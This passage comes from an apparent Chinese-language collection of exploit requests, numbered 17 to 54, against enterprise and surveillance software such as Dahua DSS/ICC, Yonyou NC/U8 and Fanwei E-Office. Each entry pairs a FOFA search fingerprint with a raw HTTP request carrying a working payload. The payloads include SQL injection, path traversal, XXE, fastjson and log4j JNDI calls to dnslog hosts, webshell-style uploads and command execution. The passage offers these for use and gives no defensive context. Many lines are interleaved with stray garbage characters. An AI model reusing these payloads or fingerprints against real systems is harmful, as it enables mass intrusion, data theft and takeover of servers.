Host: x.x.x.x
7 Y9 K' Z: b0 ^: `5 k! EUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.360 z; | ]# a+ t9 g) a$ r H
Connection: close% o/ N/ k0 w! P$ `! T, I9 r% _6 U
Accept: */*
% t$ {9 K1 P. D% z1 @Accept-Language: en
, M) t6 h& l. p( u# d" gAccept-Encoding: gzip
# |$ a K- d' J/ {! Z4 ~) v
. j3 p" Z" q) ? g5 t8 l( W8 V) C& n& o, { V$ t f* R
17. 大华 DSS itcBulletin SQL 注入1 @6 D2 a/ O8 g9 Z3 ?. I- L
FOFA:app="dahua-DSS"; ]/ f- q4 o% t
POST /portal/services/itcBulletin?wsdl HTTP/1.1
/ {8 o' C5 F. n/ aHost: x.x.x.x
6 \" u! e7 c( Y, I9 _. A0 TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& E% h) ^9 W$ `$ F) `Connection: close
! b/ K! y. v x3 l8 FContent-Length: 345/ K9 {0 N4 G, C* \) ^& D
Accept-Encoding: gzip
+ |/ q4 h! K. x) h9 p; J5 M' O* u, @, \
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>7 T7 B5 m) \1 Q$ |. h$ Q0 P
<s11:Body>; Y2 w2 F5 b n0 d$ p( O
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
' f0 W0 @, Q/ W; @' s <netMarkings>
2 x7 n* x+ C! h: f/ @0 K% s @ (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
1 h5 \* l- O( A( F& c$ z" F* O$ p0 ~6 T </netMarkings>
# m% a# w2 z+ E5 x1 A$ r </ns1:deleteBulletin>
+ N) _1 x! X% R6 s9 f </s11:Body>
5 F6 _1 `% O, O( F7 R: h</s11:Envelope>) B0 S$ I4 l G5 b; W# L
; Y Z* G4 O( g. J0 f' `
6 o6 U! y4 e7 f( c1 Y- P
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
% ?0 `2 o+ M$ w+ ?FOFA:app="dahua-DSS"
+ J, F8 g' D; ]+ _) J4 }- EGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1$ f/ q4 ?1 J1 y# T
Host: your-ip
/ K* l: O$ }& |6 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 p1 ?' }) F, g* `8 {
Accept-Encoding: gzip, deflate
' ]( B& x1 b5 h' c" z+ _8 s/ aAccept: */*& ~: X7 E H1 `. u: I
Connection: keep-alive
5 @9 F" k& p& B$ h4 Y2 I5 T. K
2 p" Q O6 O' q2 o' k7 `3 E; M8 Q& W1 \9 h) ~6 y7 j
, Y; t5 g/ j# H- W8 w19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
) I, K) J* p$ m. ~9 {FOFA:app="dahua-DSS"5 ]3 ]8 g0 |1 e* \" I r
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.16 Z: q9 L9 d) R* s6 h0 a
Host:1 z' x% ~. o# S# b7 ^- n6 H4 h4 P
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36! k" d. \; ^( ]) Z
Accept-Encoding: gzip, deflate
2 q; n% d5 W3 K1 y6 F# c$ c0 }Accept: */*9 H. C: b K& X' P. b
Connection: keep-alive1 b( i) T H& K) S9 r
8 K- ?& {" _& c- m3 j6 ^
0 o, P- N% k8 f4 V" L# v, y20. 大华ICC智能物联综合管理平台任意文件读取
# D) w2 ]" ~2 B% ]' I2 v5 h: F* \' eFOFA:body="*客户端会小于800*"
{6 P1 m) g/ {- [" _GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1& e* b& v% O' a' e0 l0 g" H
Host: x.x.x.x
1 a0 X9 m+ F5 w$ s' q+ S5 FUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36$ R7 }1 o$ t% W1 Z
Connection: close
/ q$ X9 R8 t, P% C' ZAccept: */*
% f( n. @" Q8 L, C1 Y) X1 uAccept-Language: en
{: x0 c- U* I5 t1 q1 A6 m5 YAccept-Encoding: gzip. ]4 J/ @/ m f2 q6 F ~
- M# S) j' D) X& {
$ ~; z# c0 |! T21. 大华ICC智能物联综合管理平台random远程代码执行* N. Q5 L1 _& ?9 [' L" M% d
FOFA:icon_hash="-1935899595"
- V! H4 p6 m* y1 y3 ?9 bPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1" a+ f/ ]5 R3 S( ~1 S* w, Q. ?
Host: x.x.x.x
4 }) H6 Y- A% v6 \& w8 y+ |8 qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- V/ L ^9 @- w# {8 D9 a
Content-Length: 161& @5 [( r3 N& [) _
Accept-Encoding: gzip' Y* ?7 Y, j) `/ e
Connection: close
& q2 ]3 j: Z' L6 V( K! xContent-Type: application/json;charset=utf-8- d, c6 m0 n$ T/ b1 [
8 B/ y6 r- P: e! U. i) B: l& }, @- T{
) c6 _, l: q5 h: V. V"a":{ _7 x) j' F8 r% i8 Q' P% }
"@type":"com.alibaba.fastjson.JSONObject",
1 s3 `$ i3 d" ?8 y) Q {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}9 Z! W% h) O5 B i0 J: X W2 N% }
}""
# f6 B2 e$ ^! B9 c" r' u K/ D% b}8 j) w1 R0 J% J: T, b
* D, b5 x' ?) P. T6 t
% n, s. }: k6 i22. 大华ICC智能物联综合管理平台 log4j远程代码执行
- Z- E: {( D( V; t* q9 k- A+ ZFOFA:icon_hash="-1935899595"
3 [+ L' m7 w0 J# _3 ?/ w2 G7 DPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
1 N# a' ~% X( o+ Z& H8 \ G& KHost: your-ip% ~) q5 Z: [& q5 | d. B; O* v+ o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
# l) \) U# _( b2 Q( RContent-Type: application/json;charset=utf-8
- t. a P6 ]" R# G; M# ^8 d1 n$ @, W5 n
{) X7 t! l4 U0 G4 j+ ]6 C! Y
"loginName":"${jndi:ldap://dnslog}", m8 r |" }+ p0 ~5 r! A) p5 z
}+ h7 h- c; }. s3 z
' ~# u# U& B4 c" i0 ?
- }- \* S3 D$ r9 z: M
- [ ]" } }" J$ X! Q. t23. 大华ICC智能物联综合管理平台 fastjson远程代码执行* N! F, m. ?8 a6 A4 ?4 X
FOFA:icon_hash="-1935899595"
( r2 l- _9 i3 L, r' nPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.11 U9 R( n. W( Z# i1 O
Host: your-ip
$ e+ z9 q5 i$ w5 n7 V& {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% d- }9 t& o, w; ?. @
Content-Type: application/json;charset=utf-8
/ r2 J: d( M. m$ U! W7 b HAccept-Encoding: gzip* W+ e- t" L# S" j3 m1 I6 \ g, ~
Connection: close
1 B* k t) ~# X" Z) j+ P, Q4 R5 w9 b" [6 e
{4 U: Q q. [' i1 `& k9 y
"a":{
3 s0 E1 @) b# `/ p* L* q+ B "@type":"com.alibaba.fastjson.JSONObject",9 s- q( C* u& d+ Q7 f
{"@type":"java.net.URL","val":"http://DNSLOG"}
" r. v K8 V! r: N. L7 }) i }""6 ~8 h' }! d+ w$ |3 ]
}" w/ N: q" y; V( x; g
% W" ?8 {7 @ M& p/ U! ?# x+ B* K
24. 用友NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. 用友NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. 用友NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. 用友 NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. 用友NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. 用友NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. 用友NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. 用友NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. 用友NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. 用友NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. 用友NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. 用友NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. 用友NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. 用友NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. 用友U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. 用友U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. 用友U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. 用友GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. 用友GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. 用友GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. 用友GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. 用友GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. 用友U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. 用友U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--


http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空社会化商业ERP系统 validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. 泛微E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. 迪普 DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. 畅捷通T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
"storeID":{
